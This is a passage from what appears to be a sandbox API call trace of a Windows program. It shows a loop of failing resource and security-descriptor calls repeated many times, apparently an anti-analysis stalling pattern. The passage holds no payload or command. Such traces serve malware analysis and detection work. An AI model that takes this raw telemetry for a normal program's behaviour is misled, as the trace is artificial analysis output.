dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.126] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.126] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.126] LockResource (hResData=0x0) returned 0x0 [0220.126] FreeResource (hResData=0x0) returned 0 [0220.126] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.126] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.126] LockResource (hResData=0x0) returned 0x0 [0220.126] FreeResource (hResData=0x0) returned 0 [0220.126] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.126] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.126] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.126] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.126] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.126] LockResource (hResData=0x0) returned 0x0 [0220.126] FreeResource (hResData=0x0) returned 0 [0220.126] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.126] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.126] LockResource (hResData=0x0) returned 0x0 [0220.126] FreeResource (hResData=0x0) returned 0 [0220.126] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.126] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.126] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.126] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.126] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.126] LockResource (hResData=0x0) returned 0x0 [0220.126] FreeResource (hResData=0x0) returned 0 [0220.126] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.126] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.126] LockResource (hResData=0x0) returned 0x0 [0220.126] FreeResource (hResData=0x0) returned 0 [0220.126] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.126] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.126] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.126] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.126] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.126] LockResource (hResData=0x0) returned 0x0 [0220.126] FreeResource (hResData=0x0) returned 0 [0220.127] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.127] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.127] LockResource (hResData=0x0) returned 0x0 [0220.127] FreeResource (hResData=0x0) returned 0 [0220.127] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.127] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.127] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.127] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.127] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.127] LockResource (hResData=0x0) returned 0x0 [0220.127] FreeResource (hResData=0x0) returned 0 [0220.127] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.127] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.127] LockResource (hResData=0x0) returned 0x0 [0220.127] FreeResource (hResData=0x0) returned 0 [0220.127] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.127] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.127] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.127] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.127] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.127] LockResource (hResData=0x0) returned 0x0 [0220.127] FreeResource (hResData=0x0) returned 0 [0220.127] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.127] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.127] LockResource (hResData=0x0) returned 0x0 [0220.127] FreeResource (hResData=0x0) returned 0 [0220.127] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.127] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.127] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.127] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.127] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.127] LockResource (hResData=0x0) returned 0x0 [0220.127] FreeResource (hResData=0x0) returned 0 [0220.127] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.127] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.127] LockResource (hResData=0x0) returned 0x0 [0220.127] FreeResource (hResData=0x0) returned 0 [0220.127] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.127] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.127] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.127] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.127] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.127] LockResource (hResData=0x0) returned 0x0 [0220.127] FreeResource (hResData=0x0) returned 0 [0220.128] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.128] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.128] LockResource (hResData=0x0) returned 0x0 [0220.128] FreeResource (hResData=0x0) returned 0 [0220.128] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.128] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.128] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.128] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.128] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.128] LockResource (hResData=0x0) returned 0x0 [0220.128] FreeResource (hResData=0x0) returned 0 [0220.128] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.128] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.128] LockResource (hResData=0x0) returned 0x0 [0220.128] FreeResource (hResData=0x0) returned 0 [0220.128] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.128] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.128] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.128] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.128] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.128] LockResource (hResData=0x0) returned 0x0 [0220.128] FreeResource (hResData=0x0) returned 0 [0220.128] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.128] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.128] LockResource (hResData=0x0) returned 0x0 [0220.128] FreeResource (hResData=0x0) returned 0 [0220.128] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.128] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.128] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.128] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.128] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.128] LockResource (hResData=0x0) returned 0x0 [0220.128] FreeResource (hResData=0x0) returned 0 [0220.128] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.128] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.128] LockResource (hResData=0x0) returned 0x0 [0220.128] FreeResource (hResData=0x0) returned 0 [0220.128] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.128] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.128] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.128] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.128] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.128] LockResource (hResData=0x0) returned 0x0 [0220.128] FreeResource (hResData=0x0) returned 0 [0220.129] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.129] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.129] LockResource (hResData=0x0) returned 0x0 [0220.129] FreeResource (hResData=0x0) returned 0 [0220.129] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.129] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.129] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.129] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.129] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.129] LockResource (hResData=0x0) returned 0x0 [0220.129] FreeResource (hResData=0x0) returned 0 [0220.129] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.129] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.129] LockResource (hResData=0x0) returned 0x0 [0220.129] FreeResource (hResData=0x0) returned 0 [0220.129] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.129] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.129] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.129] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.129] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.129] LockResource (hResData=0x0) returned 0x0 [0220.129] FreeResource (hResData=0x0) returned 0 [0220.129] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.129] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.129] LockResource (hResData=0x0) returned 0x0 [0220.129] FreeResource (hResData=0x0) returned 0 [0220.129] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.129] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.129] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.129] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.129] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.129] LockResource (hResData=0x0) returned 0x0 [0220.129] FreeResource (hResData=0x0) returned 0 [0220.129] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.129] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.129] LockResource (hResData=0x0) returned 0x0 [0220.129] FreeResource (hResData=0x0) returned 0 [0220.129] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.129] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.129] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.129] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.129] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.129] LockResource (hResData=0x0) returned 0x0 [0220.129] FreeResource (hResData=0x0) returned 0 [0220.130] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.130] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.130] LockResource (hResData=0x0) returned 0x0 [0220.130] FreeResource (hResData=0x0) returned 0 [0220.130] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.130] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.130] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.130] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.130] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.130] LockResource (hResData=0x0) returned 0x0 [0220.130] FreeResource (hResData=0x0) returned 0 [0220.130] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.132] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.132] LockResource (hResData=0x0) returned 0x0 [0220.132] FreeResource (hResData=0x0) returned 0 [0220.132] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.132] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.132] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.132] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.132] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.132] LockResource (hResData=0x0) returned 0x0 [0220.132] FreeResource (hResData=0x0) returned 0 [0220.132] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.132] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.132] LockResource (hResData=0x0) returned 0x0 [0220.132] FreeResource (hResData=0x0) returned 0 [0220.132] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.132] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.132] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.132] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.132] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.132] LockResource (hResData=0x0) returned 0x0 [0220.132] FreeResource (hResData=0x0) returned 0 [0220.132] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.132] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.132] LockResource (hResData=0x0) returned 0x0 [0220.132] FreeResource (hResData=0x0) returned 0 [0220.132] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.132] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.132] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.132] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.132] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.132] LockResource (hResData=0x0) returned 0x0 [0220.132] FreeResource (hResData=0x0) returned 0 [0220.132] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.132] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.132] LockResource (hResData=0x0) returned 0x0 [0220.132] FreeResource (hResData=0x0) returned 0 [0220.132] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.132] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.132] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.133] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.133] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.133] LockResource (hResData=0x0) returned 0x0 [0220.133] FreeResource (hResData=0x0) returned 0 [0220.133] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.133] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.133] LockResource (hResData=0x0) returned 0x0 [0220.133] FreeResource (hResData=0x0) returned 0 [0220.133] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.133] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.133] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.133] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.133] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.133] LockResource (hResData=0x0) returned 0x0 [0220.133] FreeResource (hResData=0x0) returned 0 [0220.133] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.133] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.133] LockResource (hResData=0x0) returned 0x0 [0220.133] FreeResource (hResData=0x0) returned 0 [0220.133] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.133] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.133] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.133] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.133] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.133] LockResource (hResData=0x0) returned 0x0 [0220.133] FreeResource (hResData=0x0) returned 0 [0220.133] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.133] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.133] LockResource (hResData=0x0) returned 0x0 [0220.133] FreeResource (hResData=0x0) returned 0 [0220.133] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.133] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.133] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.133] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.133] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.133] LockResource (hResData=0x0) returned 0x0 [0220.133] FreeResource (hResData=0x0) returned 0 [0220.133] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.133] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.133] LockResource (hResData=0x0) returned 0x0 [0220.133] FreeResource (hResData=0x0) returned 0 [0220.133] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.133] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.133] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.134] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.134] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.134] LockResource (hResData=0x0) returned 0x0 [0220.134] FreeResource (hResData=0x0) returned 0 [0220.134] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.134] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.134] LockResource (hResData=0x0) returned 0x0 [0220.134] FreeResource (hResData=0x0) returned 0 [0220.134] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.134] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.134] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.134] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.134] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.134] LockResource (hResData=0x0) returned 0x0 [0220.134] FreeResource (hResData=0x0) returned 0 [0220.134] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.134] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.134] LockResource (hResData=0x0) returned 0x0 [0220.134] FreeResource (hResData=0x0) returned 0 [0220.134] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.134] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.134] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.134] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.134] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 